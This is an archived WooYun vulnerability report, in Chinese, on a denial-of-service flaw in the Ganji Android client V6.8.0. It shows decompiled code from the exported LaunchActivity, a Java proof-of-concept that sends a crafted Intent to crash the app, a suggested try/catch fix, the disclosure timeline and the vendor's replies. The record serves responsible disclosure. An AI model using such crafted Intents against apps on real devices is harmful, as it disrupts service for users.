{"id": 84712, "wybug_id": "wooyun-2015-0143571", "wybug_title": "赶集网Android客户端V6.8.0通用拒绝服务漏洞", "wybug_corp": "赶集网", "wybug_author": "路人甲", "wybug_date": "2015-09-29 15:28", "wybug_open_date": "2016-01-11 15:32", "wybug_type": "拒绝服务", "wybug_level": "中", "wybug_rank_0": "5", "wybug_status": "厂商已经确认", "wybug_from": "http://www.wooyun.org", "wybug_tags": ["客户端程序设计错误", "拒绝服务"], "wybug_detail": "漏洞详情 披露状态：   \t\t\t\t\t\t\t\t\t2015-09-29：\t细节已通知厂商并且等待厂商处理中\t\t\t\t\t\t\t\t\t2015-09-29：\t厂商已经确认，细节仅向厂商公开\t\t\t\t\t\t\t\t\t2015-10-02：\t细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）\t\t\t\t\t\t\t\t\t2015-11-23：\t细节向核心白帽子及相关领域专家公开\t\t\t\t\t\t\t\t\t2015-12-03：\t细节向普通白帽子公开\t\t\t\t\t\t\t\t\t2015-12-13：\t细节向实习白帽子公开\t\t\t\t\t\t\t\t\t2016-01-11：\t细节向公众公开  简要描述： 该漏洞可被竞争对手利用，造成客户端拒绝服务。主要是因为客户端代码未对外部传入的Intent数据做异常处理，导致应用崩溃。 详细说明：  LaunchActivity是客户端启动的第一个activity，该activity对外暴露并且允许从外部接收Intent数据，但未对可能接收到的Intent数据做校验和异常处理。所以，在接收到畸形的Intent数据后，会导致客户端崩溃。问题代码如下：\npackage com.ganji.android.control;…………public void onCreate(Bundle paramBundle)  {    …………    paramBundle = getIntent();    Object localObject = paramBundle.getData();    if (localObject != null)    {      if ((((Uri)localObject).getScheme() != null) && (((Uri)localObject).getScheme().equals(\"wx4c5690eb66e4e42a\")))      {        WeiXinToGanJiLife.b = (Uri)localObject;        WeiXinToGanJiLife.c = Boolean.valueOf(true);      }   }  …………}\n   漏洞证明：  漏洞验证代码如下：\npublic void sendIntentButton(View view){    \t    \ttry {    \t\tString packageName = packageNameEditText.getText().toString();        \tString className = classNameEditText.getText().toString();        \t        \tpackageName = \"com.ganji.android\";        \tclassName = \"com.ganji.android.control.LaunchActivity\";        \t            Intent attackIntent = new Intent();            attackIntent.setComponent(new ComponentName(packageName, className));            attackIntent.putExtra(\"error data\", new ErrorData());                \t    startActivity(attackIntent);\t\t} catch (Exception e) {\t\t\t// TODO: handle exception\t\t}    }\n效果图：\n\n\n\n   修复方案：  在对应的问题代码处，添加try catch来处理异常   版权声明：转载请注明来源 路人甲@乌云\n ", "wybug_reply": "漏洞回应  厂商回应： 危害等级：中 漏洞Rank：6  确认时间：2015-09-29 15:58 厂商回复： 非常感谢白帽子的反馈。 最新状态： 暂无  ", "replys": "漏洞评价：\n评价\n     2015-09-30 10:21 |    \t\t赶集网(乌云厂商)\t\t \n  白帽子你好，能否提供一下你利用new ErrorData()的完整数据内容？请联系security(at)ganji.com    \n     2015-10-09 14:00 |    \t\t赶集网(乌云厂商)\t\t \n  已收到，谢谢！    \n  \n\n\n", "wybug_level_fromcorp": "中", "wybug_rank_fromcorp": 6, "Ranks": null}